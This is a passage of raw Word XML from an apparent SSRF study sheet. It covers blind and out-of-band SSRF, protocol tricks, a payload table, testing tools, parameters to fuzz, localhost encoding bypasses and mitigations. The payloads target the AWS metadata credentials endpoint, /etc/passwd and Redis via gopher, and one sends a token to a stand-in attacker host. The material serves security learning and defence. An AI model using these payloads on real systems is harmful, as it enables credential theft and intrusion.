        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>Logs leak request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40E162" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>DNS interaction observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23132135" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>Side effects occur (e.g., new user created)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDA600" w14:textId="03F83054" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:t xml:space="preserve"> Use Burp Collaborator, dnslog.cn to detect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107960A7" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>3. Out-of-Band SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D9EA4" w14:textId="08E4DA24" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:t>Exfiltrate metadata or token:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http://attacker.com/?token=&lt;response&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19167B30" w14:textId="0BAEE7C2" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDE71C" w14:textId="6DAD5D7B" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:t>Protocol-Based SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010233CF" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:t>Use different protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8A4F69" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>file:// → read local files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115465C" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>dict:// → DoS or SSRF probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58392D35" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>gopher:// → RCE via Redis injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248838C6" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>ftp://, ldap:// → trigger memory leak or info disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4BFEEA" w14:textId="1F3DDC17" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>Payload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006"/>
      </w:tblGrid>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="27C3E4EA" w14:textId="77777777" w:rsidTr="00864C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C3830" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B47A47" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="68AC3D3D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1A6DF" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>AWS Metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08DB85E4" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="713B5DD6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3CF4" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Localhost Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144D36C8" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://localhost/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="73AF8376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CA04" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>DNS Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D1A4E3" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://attacker.dnslog.cn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="7B78056D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2E65" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>File Read</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25279B28" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>file:///etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="2F8E2C79" w14:textId="77777777" w:rsidTr="00864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513C5" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Gopher (Redis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14843912" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>gopher://127.0.0.1:6379/_POST /evil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34B2D30D" w14:textId="44C3F258" w:rsidR="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>Tools for SSRF Testing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6151"/>
      </w:tblGrid>
      <w:tr w:rsidR="00453B8B" w:rsidRPr="00453B8B" w14:paraId="308C980F" w14:textId="77777777" w:rsidTr="00453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1699D" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A5D838D" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00453B8B" w:rsidRPr="00453B8B" w14:paraId="4611A622" w14:textId="77777777" w:rsidTr="0045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3724" w14:textId="0B525CE8" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t xml:space="preserve"> Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BFA22B0" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Intercept and fuzz url, uri, callback, target, next parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00453B8B" w:rsidRPr="00453B8B" w14:paraId="3906582A" w14:textId="77777777" w:rsidTr="0045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4B48" w14:textId="71C2EBB2" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t xml:space="preserve"> SSRFire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0197D656" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Automated SSRF scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00453B8B" w:rsidRPr="00453B8B" w14:paraId="7292D8BB" w14:textId="77777777" w:rsidTr="0045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2291" w14:textId="5DD90D70" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t xml:space="preserve"> Interactsh / Burp Collaborator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6647FBC6" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Blind SSRF detection (OOB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00453B8B" w:rsidRPr="00453B8B" w14:paraId="19BFCC85" w14:textId="77777777" w:rsidTr="0045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7D2A" w14:textId="6AE5729A" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t xml:space="preserve"> dnslog.cn / requestbin.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="167B7838" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Observe DNS and HTTP callbacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00453B8B" w:rsidRPr="00453B8B" w14:paraId="4989B85C" w14:textId="77777777" w:rsidTr="00453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5CB6D" w14:textId="7F6A73E1" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t xml:space="preserve"> Amass, Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="552A0EE1" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00453B8B">
              <w:t>Post-SSRF internal port scan if reachable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="724EAA4B" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B"/>
    <w:p w14:paraId="5844BB81" w14:textId="70950B57" w:rsidR="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>Testing Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54293648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url=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C144298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redirect=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BA446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uri=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9F037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next=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B13F35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path=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD283D5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lastRenderedPageBreak/>
        <w:t>image=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A186956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domain=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DAB62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website=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4AFB6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continue=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74059C2D" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4373B" w14:textId="164559FE" w:rsidR="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dest=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE6FF0B" w14:textId="1DDB4D67" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00453B8B">
        <w:t>Try encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D31952" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F2DD6" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>http://127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0E5CC8" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>http://[::1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A5008" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>Hex, octal, and dword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD018B" w14:textId="77777777" w:rsidR="00453B8B" w:rsidRPr="00453B8B" w:rsidRDefault="00453B8B" w:rsidP="00453B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00453B8B">
        <w:t>http://2130706433 (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B74BA" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C8732E">
        <w:t>Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1ABC1" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>1. Whitelist Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146E4BA" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:r w:rsidRPr="009316E7">
        <w:t>Only allow specific domains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55172AEC" w14:textId="25618C6B" w:rsidR="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:r w:rsidRPr="009316E7">
        <w:t xml:space="preserve">ALLOWED_HOSTS = </w:t>
      </w:r>
      <w:r w:rsidRPr="009316E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>["images.example.com"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009316E7">
        <w:t>Reject IPs, localhost, metadata, internal ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFAF803" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>2. Block Dangerous Schemes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23098321" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:r w:rsidRPr="009316E7">
        <w:t>Allow only http and https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF83C04" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t xml:space="preserve">Block </w:t>
      </w:r>
      <w:r w:rsidRPr="009316E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>file://, gopher://, dict://, ftp://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02D8C0" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009316E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. DNS Rebinding Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E422D9F" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7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9316E7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Validate resolved IP matches expected domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD0564" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>4. Network Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784999C" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:r w:rsidRPr="009316E7">
        <w:t>Web server should not have access to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505A5B3" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>Cloud metadata (169.254.169.254)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B2AE6D" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>Redis, MySQL, Jenkins, internal APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AD005" w14:textId="60FF1273" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:lastRenderedPageBreak/>
        <w:t>5. Use SSRF-Protected Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DAFDBF" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:r w:rsidRPr="009316E7">
        <w:t>Avoid using low-level functions (file_get_contents, curl) on unvalidated input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2E5DB" w14:textId="5596815A" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>6. Logging &amp; Alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8B510" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:r w:rsidRPr="009316E7">
        <w:t>Monitor unexpected outbound requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6EAA0" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>Internal IPs</w:t>
      </w:r>
    </w:p>
